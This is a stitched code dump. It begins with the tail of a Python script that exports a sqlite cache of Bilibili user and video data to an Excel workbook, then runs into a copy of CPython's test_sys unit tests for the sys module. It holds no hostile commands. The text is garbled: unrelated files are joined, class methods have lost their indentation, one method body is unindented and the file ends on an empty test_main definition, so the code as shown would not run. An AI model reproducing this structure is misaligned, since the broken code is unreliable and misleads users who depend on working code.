        # Trailing space preserved from the original query template.
        query = base + ' '
    cur.execute(query)
    return cur.fetchall()
def sqlite_to_workbook(cur, table, workbook):
    """Copy one sqlite table into a new worksheet of *workbook*.

    Known tables get column widths and a bold header row; well-known column
    names are written with Chinese display headings.
    """
    ws = workbook.add_worksheet(table)
    print ('create table %s.' % table)
    # Per-table cosmetic formatting.
    if table == 'related_user':
        ws.set_column('A:A', 10)
        ws.set_column('B:C', 14)
        ws.set_column('D:E', 18)
        ws.set_column('F:G', 12)
        ws.set_column('H:I', 18)
        ws.set_column('J:K', 20)
        bold = workbook.add_format({'bold': True})
        ws.set_row(0, 20, bold)
    elif table == 'related_videos':
        ws.set_column('A:A', 18)
        bold = workbook.add_format({'bold': True})
        ws.set_row(0, 20, bold)
        ws.set_column('B:B', 150)
    # Header row: translate known column names to display headings.
    for colx, heading in enumerate(sqlite_get_col_names(cur, table)):
        if heading == 'id':
            ws.write(0, colx, '用户ID')
        elif heading == 'owned_related_num':
            ws.write(0, colx, '发布相关视频数')
        elif heading == 'fav_related_num':
            ws.write(0, colx, '收藏相关视频数')
        elif heading == 'owned_related_bvids':
            ws.write(0, colx, '发布相关视频的BV号')
        elif heading == 'fav_related_bvids':
            ws.write(0, colx, '收藏相关视频的BV号')
        elif heading == 'owned_num':
            ws.write(0, colx, '发布视频总数')
        elif heading == 'fav_num':
            ws.write(0, colx, '收藏视频总数')
        elif heading == 'owned_bvids':
            ws.write(0, colx, '所有发布视频的BV号')
        elif heading == 'fav_bvids':
            ws.write(0, colx, '所有收藏视频的BV号')
        elif heading == 'last_owned_time':
            ws.write(0, colx, '最近发布视频时间')
        elif heading == 'last_fav_time':
            ws.write(0, colx, '最近收藏视频时间')
        elif heading == 'bvid':
            ws.write(0, colx, '视频BV号')
        elif heading == 'tags':
            ws.write(0, colx, '视频标签')
        else:
            ws.write(0, colx, heading)
    # Data rows: columns 9/10 are unix timestamps - render as local time.
    for rowy, row in enumerate(sqlite_query(cur, table)):
        for colx, text in enumerate(row):
            if colx == 9 or colx == 10:
                timeStamp = text
                timeArray = time.localtime(timeStamp)
                otherStyleTime = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
                ws.write(rowy + 1, colx, otherStyleTime)
            else:
                ws.write(rowy + 1, colx, text)
def db2_xls_main(dbpath):
    """Export every table of the sqlite db at *dbpath* to a sibling .xls file."""
    # Swap the extension: /path/cache.db -> /path/cache.xls
    xlspath = dbpath[0:dbpath.rfind('.')] + '.xls'
    print ("<%s> --> <%s>" % (dbpath, xlspath))
    db = sqlite3.connect(dbpath)
    cur = db.cursor()
    workbook = xlsxwriter.Workbook(xlspath)  # create the Excel workbook
    # Enumerate user tables via sqlite_master and copy each into a sheet.
    for tbl_name in [row[0] for row in sqlite_query(cur, 'sqlite_master', 'tbl_name', 'type = \'table\'')]:
        sqlite_to_workbook(cur, tbl_name, workbook)
    cur.close()
    db.close()
    workbook.close()
def db2_xls_main_go():
    """Convenience wrapper: export the module's cache.db next to this file."""
    # arg == database path
    log_path = os.path.dirname(__file__) + '/cache.db'
    # main(sys.argv[1])
    db2_xls_main(log_path)
main() |
test_sys.py | # -*- coding: iso-8859-1 -*-
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
class SysModuleTest(unittest.TestCase):
def setUp(self):
    """Snapshot stdout/stderr/displayhook so each test can restore them."""
    self.orig_stdout = sys.stdout
    self.orig_stderr = sys.stderr
    self.orig_displayhook = sys.displayhook
def tearDown(self):
    """Restore the streams/hook saved in setUp."""
    sys.stdout = self.orig_stdout
    sys.stderr = self.orig_stderr
    sys.displayhook = self.orig_displayhook
def test_original_displayhook(self):
    """sys.__displayhook__ prints reprs, sets builtins._, needs sys.stdout."""
    import builtins
    out = io.StringIO()
    sys.stdout = out
    dh = sys.__displayhook__
    # Called with no argument it must raise TypeError.
    self.assertRaises(TypeError, dh)
    if hasattr(builtins, "_"):
        del builtins._
    # None is not displayed and does not set builtins._.
    dh(None)
    self.assertEqual(out.getvalue(), "")
    self.assertTrue(not hasattr(builtins, "_"))
    # Non-None values are printed and recorded in builtins._.
    dh(42)
    self.assertEqual(out.getvalue(), "42\n")
    self.assertEqual(builtins._, 42)
    # Without sys.stdout the hook must raise RuntimeError.
    del sys.stdout
    self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
    """Evaluating in 'single' mode without sys.displayhook raises RuntimeError."""
    del sys.displayhook
    code = compile("42", "<string>", "single")
    self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
    """A user-installed displayhook's exception propagates out of eval."""
    def baddisplayhook(obj):
        raise ValueError
    sys.displayhook = baddisplayhook
    code = compile("42", "<string>", "single")
    self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
    """sys.__excepthook__ writes the traceback to sys.stderr."""
    err = io.StringIO()
    sys.stderr = err
    eh = sys.__excepthook__
    # Called with no arguments it must raise TypeError.
    self.assertRaises(TypeError, eh)
    try:
        raise ValueError(42)
    except ValueError as exc:
        eh(*sys.exc_info())
    self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
    """Passing a non-exception value to sys.excepthook reports a TypeError."""
    with test.support.captured_output("stderr") as stderr:
        sys.excepthook(1, '1', 1)
    self.assertTrue("TypeError: print_exception(): Exception expected for " \
                    "value, str found" in stderr.getvalue())

# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
    """sys.exit argument handling and the interpreter's exit machinery."""
    self.assertRaises(TypeError, sys.exit, 42, 42)

    # call without argument
    try:
        sys.exit(0)
    except SystemExit as exc:
        self.assertEqual(exc.code, 0)
    except:
        self.fail("wrong exception")
    else:
        self.fail("no exception")

    # call with integer argument
    try:
        sys.exit(42)
    except SystemExit as exc:
        self.assertEqual(exc.code, 42)
    except:
        self.fail("wrong exception")
    else:
        self.fail("no exception")

    # call with tuple argument with one entry
    # entry will be unpacked
    try:
        sys.exit((42,))
    except SystemExit as exc:
        self.assertEqual(exc.code, 42)
    except:
        self.fail("wrong exception")
    else:
        self.fail("no exception")

    # call with string argument
    try:
        sys.exit("exit")
    except SystemExit as exc:
        self.assertEqual(exc.code, "exit")
    except:
        self.fail("wrong exception")
    else:
        self.fail("no exception")

    # call with tuple argument with two entries
    try:
        sys.exit((17, 23))
    except SystemExit as exc:
        self.assertEqual(exc.code, (17, 23))
    except:
        self.fail("wrong exception")
    else:
        self.fail("no exception")

    # test that the exit machinery handles SystemExits properly
    rc = subprocess.call([sys.executable, "-c",
                          "raise SystemExit(47)"])
    self.assertEqual(rc, 47)

    def check_exit_message(code, expected):
        # Run *code* in a subprocess and check stderr starts with *expected*.
        process = subprocess.Popen([sys.executable, "-c", code],
                                   stderr=subprocess.PIPE)
        stdout, stderr = process.communicate()
        self.assertEqual(process.returncode, 1)
        self.assertTrue(stderr.startswith(expected),
                        "%s doesn't start with %s" % (ascii(stderr), ascii(expected)))

    # test that the stderr buffer is flushed before the exit message is
    # written into stderr
    check_exit_message(
        r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
        b"unflushed,message")

    # test that the exit message is written with backslashreplace error
    # handler to stderr
    check_exit_message(
        r'import sys; sys.exit("surrogates:\uDCFF")',
        b"surrogates:\\udcff")
def test_getdefaultencoding(self):
    """sys.getdefaultencoding rejects arguments and returns a str."""
    self.assertRaises(TypeError, sys.getdefaultencoding, 42)
    # can't check more than the type, as the user might have changed it
    self.assertTrue(isinstance(sys.getdefaultencoding(), str))

# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
    """set/getcheckinterval round-trips; setter requires an argument."""
    self.assertRaises(TypeError, sys.setcheckinterval)
    orig = sys.getcheckinterval()
    for n in 0, 100, 120, orig:  # orig last to restore starting state
        sys.setcheckinterval(n)
        self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
    """set/getrecursionlimit argument validation and round-trip."""
    self.assertRaises(TypeError, sys.getrecursionlimit, 42)
    oldlimit = sys.getrecursionlimit()
    self.assertRaises(TypeError, sys.setrecursionlimit)
    self.assertRaises(ValueError, sys.setrecursionlimit, -42)
    sys.setrecursionlimit(10000)
    self.assertEqual(sys.getrecursionlimit(), 10000)
    sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
    """Hitting the recursion limit twice must raise RuntimeError both times."""
    # NOTE: this test is slightly fragile in that it depends on the current
    # recursion count when executing the test being low enough so as to
    # trigger the recursion recovery detection in the _Py_MakeEndRecCheck
    # macro (see ceval.h).
    oldlimit = sys.getrecursionlimit()
    def f():
        f()
    try:
        for i in (50, 1000):
            # Issue #5392: stack overflow after hitting recursion limit twice
            sys.setrecursionlimit(i)
            self.assertRaises(RuntimeError, f)
            self.assertRaises(RuntimeError, f)
    finally:
        sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
    """Overflowing the stack while recovering from overflow is a fatal error."""
    # A fatal error occurs if a second recursion limit is hit when recovering
    # from a first one.
    if os.name == "nt":
        raise unittest.SkipTest(
            "under Windows, test would generate a spurious crash dialog")
    code = textwrap.dedent("""
        import sys

        def f():
            try:
                f()
            except RuntimeError:
                f()

        sys.setrecursionlimit(%d)
        f()""")
    for i in (50, 1000):
        sub = subprocess.Popen([sys.executable, '-c', code % i],
                               stderr=subprocess.PIPE)
        err = sub.communicate()[1]
        self.assertTrue(sub.returncode, sub.returncode)
        self.assertTrue(
            b"Fatal Python error: Cannot recover from stack overflow" in err,
            err)
def test_getwindowsversion(self):
    """On Windows, getwindowsversion returns a 5-tuple (4 ints + str)."""
    if hasattr(sys, "getwindowsversion"):
        v = sys.getwindowsversion()
        self.assertTrue(isinstance(v, tuple))
        self.assertEqual(len(v), 5)
        self.assertTrue(isinstance(v[0], int))
        self.assertTrue(isinstance(v[1], int))
        self.assertTrue(isinstance(v[2], int))
        self.assertTrue(isinstance(v[3], int))
        self.assertTrue(isinstance(v[4], str))
def test_call_tracing(self):
    """sys.call_tracing rejects a non-tuple args argument."""
    self.assertRaises(TypeError, sys.call_tracing, type, 2)
def test_dlopenflags(self):
    """set/getdlopenflags round-trip where the platform provides them."""
    if hasattr(sys, "setdlopenflags"):
        self.assertTrue(hasattr(sys, "getdlopenflags"))
        self.assertRaises(TypeError, sys.getdlopenflags, 42)
        oldflags = sys.getdlopenflags()
        self.assertRaises(TypeError, sys.setdlopenflags)
        sys.setdlopenflags(oldflags + 1)
        self.assertEqual(sys.getdlopenflags(), oldflags + 1)
        sys.setdlopenflags(oldflags)
def test_refcount(self):
    """sys.getrefcount() must observe references being created/destroyed."""
    # n here must be a global in order for this test to pass while
    # tracing with a python function. Tracing calls PyFrame_FastToLocals
    # which will add a copy of any locals to the frame object, causing
    # the reference count to increase by 2 instead of 1.
    global n
    self.assertRaises(TypeError, sys.getrefcount)  # requires an argument
    c = sys.getrefcount(None)
    n = None   # one new reference to None...
    self.assertEqual(sys.getrefcount(None), c+1)
    del n      # ...and it is gone again
    self.assertEqual(sys.getrefcount(None), c)
    if hasattr(sys, "gettotalrefcount"):
        # gettotalrefcount() exists only on debug builds
        self.assertTrue(isinstance(sys.gettotalrefcount(), int))
def test_getframe(self):
    """sys._getframe(): argument validation, and frame 0 is the caller."""
    self.assertRaises(TypeError, sys._getframe, 42, 42)       # too many args
    self.assertRaises(ValueError, sys._getframe, 2000000000)  # depth too large
    # The zero-depth frame must be this very method's frame.
    self.assertTrue(
        SysModuleTest.test_getframe.__code__ \
        is sys._getframe().f_code
    )
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
    """Dispatch to the threaded or unthreaded sys._current_frames() check,
    depending on whether this build has thread support."""
    try:
        import _thread
    except ImportError:
        self.current_frames_without_threads()
    else:
        self.current_frames_with_threads()
# Test sys._current_frames() in a WITH_THREADS build.
def current_frames_with_threads(self):
    """Block a spawned thread at a known spot, then verify that
    sys._current_frames() maps both thread ids to the expected frames."""
    import threading, _thread
    import traceback
    # Spawn a thread that blocks at a known place. Then the main
    # thread does sys._current_frames(), and verifies that the frames
    # returned make sense.
    entered_g = threading.Event()
    leave_g = threading.Event()
    thread_info = []  # the thread's id
    def f123():
        g456()
    def g456():
        thread_info.append(_thread.get_ident())
        entered_g.set()
        leave_g.wait()  # park here until the main thread releases us
    t = threading.Thread(target=f123)
    t.start()
    entered_g.wait()
    # At this point, t has finished its entered_g.set(), although it's
    # impossible to guess whether it's still on that line or has moved on
    # to its leave_g.wait().
    self.assertEqual(len(thread_info), 1)
    thread_id = thread_info[0]
    d = sys._current_frames()
    main_id = _thread.get_ident()
    self.assertTrue(main_id in d)
    self.assertTrue(thread_id in d)
    # Verify that the captured main-thread frame is _this_ frame.
    frame = d.pop(main_id)
    self.assertTrue(frame is sys._getframe())
    # Verify that the captured thread frame is blocked in g456, called
    # from f123. This is a little tricky, since various bits of
    # threading.py are also in the thread's call stack.
    frame = d.pop(thread_id)
    stack = traceback.extract_stack(frame)
    for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
        if funcname == "f123":
            break
    else:
        self.fail("didn't find f123() on thread's call stack")
    self.assertEqual(sourceline, "g456()")
    # And the next record must be for g456().
    filename, lineno, funcname, sourceline = stack[i+1]
    self.assertEqual(funcname, "g456")
    self.assertTrue(sourceline in ["leave_g.wait()", "entered_g.set()"])
    # Reap the spawned thread.
    leave_g.set()
    t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
    """Without thread support there is exactly one entry, filed under the
    artificial thread id 0, and it is the caller's own frame."""
    frames = sys._current_frames()
    self.assertEqual(len(frames), 1)
    self.assertTrue(0 in frames)
    self.assertTrue(frames[0] is sys._getframe())
def test_attributes(self):
    """Spot-check the types and values of sys's documented attributes."""
    self.assertTrue(isinstance(sys.api_version, int))
    self.assertTrue(isinstance(sys.argv, list))
    self.assertTrue(sys.byteorder in ("little", "big"))
    self.assertTrue(isinstance(sys.builtin_module_names, tuple))
    self.assertTrue(isinstance(sys.copyright, str))
    self.assertTrue(isinstance(sys.exec_prefix, str))
    self.assertTrue(isinstance(sys.executable, str))
    self.assertEqual(len(sys.float_info), 11)
    self.assertEqual(sys.float_info.radix, 2)
    self.assertEqual(len(sys.int_info), 2)
    self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
    self.assertTrue(sys.int_info.sizeof_digit >= 1)
    self.assertEqual(type(sys.int_info.bits_per_digit), int)
    self.assertEqual(type(sys.int_info.sizeof_digit), int)
    self.assertTrue(isinstance(sys.hexversion, int))
    self.assertTrue(isinstance(sys.maxsize, int))
    self.assertTrue(isinstance(sys.maxunicode, int))
    self.assertTrue(isinstance(sys.platform, str))
    self.assertTrue(isinstance(sys.prefix, str))
    self.assertTrue(isinstance(sys.version, str))
    vi = sys.version_info
    self.assertTrue(isinstance(vi[:], tuple))
    self.assertEqual(len(vi), 5)
    self.assertTrue(isinstance(vi[0], int))
    self.assertTrue(isinstance(vi[1], int))
    self.assertTrue(isinstance(vi[2], int))
    self.assertTrue(vi[3] in ("alpha", "beta", "candidate", "final"))
    self.assertTrue(isinstance(vi[4], int))
    self.assertTrue(isinstance(vi.major, int))
    self.assertTrue(isinstance(vi.minor, int))
    self.assertTrue(isinstance(vi.micro, int))
    self.assertTrue(vi.releaselevel in
                    ("alpha", "beta", "candidate", "final"))
    self.assertTrue(isinstance(vi.serial, int))
    # The named fields and positional indices of version_info must agree.
    self.assertEqual(vi[0], vi.major)
    self.assertEqual(vi[1], vi.minor)
    self.assertEqual(vi[2], vi.micro)
    self.assertEqual(vi[3], vi.releaselevel)
    self.assertEqual(vi[4], vi.serial)
    self.assertTrue(vi > (1,0,0))
def test_43581(self):
    """Bug #43581: the real stdout and stderr must share an encoding.

    sys.stdout itself may be a StringIO when the suite runs under
    regrtest, so the original __stdout__/__stderr__ objects are used.
    """
    self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
    """sys.intern() canonicalizes equal strings and rejects str subclasses."""
    global numruns   # module-level counter: keeps each run's string unique
    numruns += 1
    self.assertRaises(TypeError, sys.intern)  # requires an argument
    s = "never interned before" + str(numruns)
    self.assertTrue(sys.intern(s) is s)
    s2 = s.swapcase().swapcase()  # equal value, distinct object
    self.assertTrue(sys.intern(s2) is s)
    # Subclasses of string can't be interned, because they
    # provide too much opportunity for insane things to happen.
    # We don't want them in the interned dict and if they aren't
    # actually interned, we don't want to create the appearance
    # that they are by allowing intern() to succeed.
    class S(str):
        def __hash__(self):
            return 123
    self.assertRaises(TypeError, sys.intern, S("abc"))
def test_main_invalid_unicode(self):
    """Printing a string not encodable on stdout must make the child exit
    with a UnicodeEncodeError traceback rather than crash."""
    import locale
    non_decodable = b"\xff"
    encoding = locale.getpreferredencoding()
    try:
        non_decodable.decode(encoding)
    except UnicodeDecodeError:
        pass
    else:
        # The test only makes sense if the byte really is undecodable here.
        self.skipTest('%r is decodable with encoding %s'
            % (non_decodable, encoding))
    code = b'print("' + non_decodable + b'")'
    p = subprocess.Popen([sys.executable, "-c", code], stderr=subprocess.PIPE)
    stdout, stderr = p.communicate()
    self.assertEqual(p.returncode, 1)
    self.assertTrue(b"UnicodeEncodeError:" in stderr,
                    "%r not in %s" % (b"UnicodeEncodeError:", ascii(stderr)))
def test_sys_flags(self):
    """Every documented command-line flag is an int attribute of sys.flags."""
    self.assertTrue(sys.flags)
    expected = ("debug", "division_warning",
                "inspect", "interactive", "optimize", "dont_write_bytecode",
                "no_user_site", "no_site", "ignore_environment", "verbose",
                "bytes_warning")
    for flag_name in expected:
        self.assertTrue(hasattr(sys.flags, flag_name), flag_name)
        self.assertEqual(type(getattr(sys.flags, flag_name)), int, flag_name)
    self.assertTrue(repr(sys.flags))
    self.assertEqual(len(sys.flags), len(expected))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
    """PYTHONIOENCODING must control a child's stdout encoding and its
    error handler ('encoding:errors' form)."""
    env = dict(os.environ)
    # Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
    # not representable in ASCII.
    env["PYTHONIOENCODING"] = "cp424"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                         stdout = subprocess.PIPE, env=env)
    out = p.stdout.read()
    self.assertEqual(out, "\xa2\n".encode("cp424"))
    # With an explicit errors handler, the unencodable char becomes '?'.
    env["PYTHONIOENCODING"] = "ascii:replace"
    p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
                         stdout = subprocess.PIPE, env=env)
    out = p.stdout.read().strip()
    self.assertEqual(out, b'?')
def test_executable(self):
    """With a bogus argv[0], the child's sys.executable is either empty
    or the real interpreter path."""
    # Issue #7774: Ensure that sys.executable is an empty string if argv[0]
    # has been set to an non existent program name and Python is unable to
    # retrieve the real program name
    # For a normal installation, it should work without 'cwd'
    # argument. For test runs in the build directory, see #7774.
    python_dir = os.path.dirname(os.path.realpath(sys.executable))
    p = subprocess.Popen(
        ["nonexistent", "-c",
         'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
        executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
    stdout = p.communicate()[0]
    executable = stdout.strip().decode("ASCII")
    p.wait()
    self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
class SizeofTest(unittest.TestCase):
    """Verify sys.getsizeof() for built-in types by modelling each type's
    C struct layout with struct format codes (one code per C field)."""

    TPFLAGS_HAVE_GC = 1<<14   # type's instances are tracked by the GC
    TPFLAGS_HEAPTYPE = 1<<9   # type was created dynamically (heap type)

    def setUp(self):
        # Platform sizes of the basic C types, measured via struct.
        self.c = len(struct.pack('c', ' '))
        self.H = len(struct.pack('H', 0))
        self.i = len(struct.pack('i', 0))
        self.l = len(struct.pack('l', 0))
        self.P = len(struct.pack('P', 0))
        # due to missing size_t information from struct, it is assumed that
        # sizeof(Py_ssize_t) = sizeof(void*)
        self.header = 'PP'                 # PyObject_HEAD (refcount + type)
        self.vheader = self.header + 'P'   # PyObject_VAR_HEAD (+ ob_size)
        if hasattr(sys, "gettotalrefcount"):
            # debug builds add two tracing pointers to every object head
            self.header += '2P'
            self.vheader += '2P'
        self.longdigit = sys.int_info.sizeof_digit
        import _testcapi
        self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
        self.file = open(test.support.TESTFN, 'wb')

    def tearDown(self):
        self.file.close()
        test.support.unlink(test.support.TESTFN)

    def check_sizeof(self, o, size):
        """Assert sys.getsizeof(o) == size, adding the GC header size for
        GC-tracked objects."""
        result = sys.getsizeof(o)
        # add GC header size
        if ((type(o) == type) and (o.__flags__ & self.TPFLAGS_HEAPTYPE) or\
           ((type(o) != type) and (type(o).__flags__ & self.TPFLAGS_HAVE_GC))):
            size += self.gc_headsize
        msg = 'wrong size for %s: got %d, expected %d' \
                % (type(o), result, size)
        self.assertEqual(result, size, msg)

    def calcsize(self, fmt):
        """Wrapper around struct.calcsize which enforces the alignment of the
        end of a structure to the alignment requirement of pointer.

        Note: This wrapper should only be used if a pointer member is included
        and no member with a size larger than a pointer exists.
        """
        return struct.calcsize(fmt + '0P')

    def test_gc_head_size(self):
        # Check that the gc header size is added to objects tracked by the gc.
        h = self.header
        vh = self.vheader
        size = self.calcsize
        gc_header_size = self.gc_headsize
        # bool objects are not gc tracked
        self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
        # but lists are
        self.assertEqual(sys.getsizeof([]), size(vh + 'PP') + gc_header_size)

    def test_default(self):
        """getsizeof()'s default argument is ignored when __sizeof__ works."""
        h = self.header
        vh = self.vheader
        size = self.calcsize
        self.assertEqual(sys.getsizeof(True), size(vh) + self.longdigit)
        self.assertEqual(sys.getsizeof(True, -1), size(vh) + self.longdigit)

    def test_objecttypes(self):
        # check all types defined in Objects/
        h = self.header
        vh = self.vheader
        size = self.calcsize
        check = self.check_sizeof
        # bool
        check(True, size(vh) + self.longdigit)
        # buffer
        # XXX
        # builtin_function_or_method
        check(len, size(h + '3P'))
        # bytearray
        samples = [b'', b'u'*100000]
        for sample in samples:
            x = bytearray(sample)
            check(x, size(vh + 'iPP') + x.__alloc__() * self.c)
        # bytearray_iterator
        check(iter(bytearray()), size(h + 'PP'))
        # cell
        def get_cell():
            x = 42
            def inner():
                return x
            return inner
        check(get_cell().__closure__[0], size(h + 'P'))
        # code
        check(get_cell().__code__, size(h + '5i8Pi2P'))
        # complex
        check(complex(0,1), size(h + '2d'))
        # method_descriptor (descriptor object)
        check(str.lower, size(h + '2PP'))
        # classmethod_descriptor (descriptor object)
        # XXX
        # member_descriptor (descriptor object)
        import datetime
        check(datetime.timedelta.days, size(h + '2PP'))
        # getset_descriptor (descriptor object)
        import collections
        check(collections.defaultdict.default_factory, size(h + '2PP'))
        # wrapper_descriptor (descriptor object)
        check(int.__add__, size(h + '2P2P'))
        # method-wrapper (descriptor object)
        check({}.__iter__, size(h + '2P'))
        # dict
        check({}, size(h + '3P2P' + 8*'P2P'))
        longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
        check(longdict, size(h + '3P2P' + 8*'P2P') + 16*size('P2P'))
        # dictionary-keyiterator
        check({}.keys(), size(h + 'P'))
        # dictionary-valueiterator
        check({}.values(), size(h + 'P'))
        # dictionary-itemiterator
        check({}.items(), size(h + 'P'))
        # dictproxy
        class C(object): pass
        check(C.__dict__, size(h + 'P'))
        # BaseException
        check(BaseException(), size(h + '5P'))
        # UnicodeEncodeError
        check(UnicodeEncodeError("", "", 0, 0, ""), size(h + '5P 2P2PP'))
        # UnicodeDecodeError
        # XXX
        # check(UnicodeDecodeError("", "", 0, 0, ""), size(h + '5P2PP'))
        # UnicodeTranslateError
        check(UnicodeTranslateError("", 0, 1, ""), size(h + '5P 2P2PP'))
        # ellipses
        check(Ellipsis, size(h + ''))
        # EncodingMap
        import codecs, encodings.iso8859_3
        x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
        check(x, size(h + '32B2iB'))
        # enumerate
        check(enumerate([]), size(h + 'l3P'))
        # reverse
        check(reversed(''), size(h + 'PP'))
        # float
        check(float(0), size(h + 'd'))
        # sys.floatinfo
        check(sys.float_info, size(vh) + self.P * len(sys.float_info))
        # frame
        import inspect
        CO_MAXBLOCKS = 20
        x = inspect.currentframe()
        ncells = len(x.f_code.co_cellvars)
        nfrees = len(x.f_code.co_freevars)
        extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
                 ncells + nfrees - 1
        check(x, size(vh + '12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
        # function
        def func(): pass
        check(func, size(h + '11P'))
        class c():
            @staticmethod
            def foo():
                pass
            @classmethod
            def bar(cls):
                pass
            # staticmethod
            check(foo, size(h + 'P'))
            # classmethod
            check(bar, size(h + 'P'))
        # generator
        def get_gen(): yield 1
        check(get_gen(), size(h + 'Pi2P'))
        # iterator
        check(iter('abc'), size(h + 'lP'))
        # callable-iterator
        import re
        check(re.finditer('',''), size(h + '2P'))
        # list
        samples = [[], [1,2,3], ['1', '2', '3']]
        for sample in samples:
            check(sample, size(vh + 'PP') + len(sample)*self.P)
        # sortwrapper (list)
        # XXX
        # cmpwrapper (list)
        # XXX
        # listiterator (list)
        check(iter([]), size(h + 'lP'))
        # listreverseiterator (list)
        check(reversed([]), size(h + 'lP'))
        # long
        check(0, size(vh))
        check(1, size(vh) + self.longdigit)
        check(-1, size(vh) + self.longdigit)
        PyLong_BASE = 2**sys.int_info.bits_per_digit
        check(int(PyLong_BASE), size(vh) + 2*self.longdigit)
        check(int(PyLong_BASE**2-1), size(vh) + 2*self.longdigit)
        check(int(PyLong_BASE**2), size(vh) + 3*self.longdigit)
        # memory
        check(memoryview(b''), size(h + 'P PP2P2i7P'))
        # module
        check(unittest, size(h + '3P'))
        # None
        check(None, size(h + ''))
        # NotImplementedType
        check(NotImplemented, size(h))
        # object
        check(object(), size(h + ''))
        # property (descriptor object)
        class C(object):
            def getx(self): return self.__x
            def setx(self, value): self.__x = value
            def delx(self): del self.__x
            x = property(getx, setx, delx, "")
            check(x, size(h + '4Pi'))
        # PyCapsule
        # XXX
        # rangeiterator
        check(iter(range(1)), size(h + '4l'))
        # reverse
        check(reversed(''), size(h + 'PP'))
        # range
        check(range(1), size(h + '3P'))
        check(range(66000), size(h + '3P'))
        # set
        # frozenset
        PySet_MINSIZE = 8
        samples = [[], range(10), range(50)]
        s = size(h + '3P2P' + PySet_MINSIZE*'lP' + 'lP')
        for sample in samples:
            minused = len(sample)
            if minused == 0: tmp = 1
            # the computation of minused is actually a bit more complicated
            # but this suffices for the sizeof test
            minused = minused*2
            newsize = PySet_MINSIZE
            while newsize <= minused:
                newsize = newsize << 1
            if newsize <= 8:
                check(set(sample), s)
                check(frozenset(sample), s)
            else:
                check(set(sample), s + newsize*struct.calcsize('lP'))
                check(frozenset(sample), s + newsize*struct.calcsize('lP'))
        # setiterator
        check(iter(set()), size(h + 'P3P'))
        # slice
        check(slice(0), size(h + '3P'))
        # super
        check(super(int), size(h + '3P'))
        # tuple
        check((), size(vh))
        check((1,2,3), size(vh) + 3*self.P)
        # type
        # (PyTypeObject + PyNumberMethods + PyMappingMethods +
        #  PySequenceMethods + PyBufferProcs)
        s = size(vh + 'P2P15Pl4PP9PP11PI') + size('16Pi17P 3P 10P 2P 2P')
        check(int, s)
        # class
        class newstyleclass(object): pass
        check(newstyleclass, s)
        # unicode
        usize = len('\0'.encode('unicode-internal'))
        samples = ['', '1'*100]
        # we need to test for both sizes, because we don't know if the string
        # has been cached
        for s in samples:
            basicsize = size(h + 'PPliP') + usize * (len(s) + 1)
            check(s, basicsize)
        # weakref
        import weakref
        check(weakref.ref(int), size(h + '2Pl2P'))
        # weakproxy
        # XXX
        # weakcallableproxy
        check(weakref.proxy(int), size(h + '2Pl2P'))

    def test_pythontypes(self):
        # check all types defined in Python/
        h = self.header
        vh = self.vheader
        size = self.calcsize
        check = self.check_sizeof
        # _ast.AST
        import _ast
        check(_ast.AST(), size(h + ''))
        # imp.NullImporter
        import imp
        check(imp.NullImporter(self.file.name), size(h + ''))
        try:
            raise TypeError
        except TypeError:
            tb = sys.exc_info()[2]
            # traceback
            if tb != None:
                check(tb, size(h + '2P2i'))
        # symtable entry
        # XXX
        # sys.flags
        check(sys.flags, size(vh) + self.P * len(sys.flags))
def test_getfilesystemencoding(self):
    """The filesystem encoding names a real codec ('utf-8' on darwin),
    even when the interpreter is forced into the C locale."""
    import codecs
    def check_fsencoding(fs_encoding):
        if sys.platform == 'darwin':
            self.assertEqual(fs_encoding, 'utf-8')
        elif fs_encoding is None:
            return
        codecs.lookup(fs_encoding)  # raises LookupError if not a real codec
    fs_encoding = sys.getfilesystemencoding()
    check_fsencoding(fs_encoding)
    # Even in C locale
    try:
        sys.executable.encode('ascii')
    except UnicodeEncodeError:
        # Python doesn't start with ASCII locale if its path is not ASCII,
        # see issue #8611
        pass
    else:
        env = os.environ.copy()
        env['LANG'] = 'C'
        output = subprocess.check_output(
            [sys.executable, "-c",
             "import sys; print(sys.getfilesystemencoding())"],
            env=env)
        fs_encoding = output.rstrip().decode('ascii')
        check_fsencoding(fs_encoding)
def test_setfilesystemencoding(self):
    """sys.setfilesystemencoding() round-trips, and rejects unknown codecs."""
    old = sys.getfilesystemencoding()
    try:
        sys.setfilesystemencoding("iso-8859-1")
        self.assertEqual(sys.getfilesystemencoding(), "iso-8859-1")
    finally:
        sys.setfilesystemencoding(old)  # always restore
    try:
        self.assertRaises(LookupError, sys.setfilesystemencoding, "xxx")
    finally:
        sys.setfilesystemencoding(old)  # restore even if the call succeeded
def test_main():
